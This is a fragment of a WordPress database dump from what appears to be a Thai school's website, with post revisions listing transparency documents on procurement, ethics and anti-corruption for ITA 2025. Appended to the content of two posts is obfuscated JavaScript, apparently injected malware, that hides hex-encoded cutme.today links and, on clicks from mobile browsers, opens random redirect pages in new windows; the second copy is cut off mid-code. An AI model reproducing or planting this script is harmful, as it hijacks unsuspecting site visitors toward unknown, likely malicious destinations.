kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-05-21 12:09:55','2025-05-21 05:09:55','',871,'http://pakhaeng.ssk.in.th/?p=1264',0,'revision','',0),
(1267,1,'2025-05-21 12:30:59','2025-05-21 05:30:59','<!-- wp:shortcode -->\n[forminator_form id=\"1266\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const 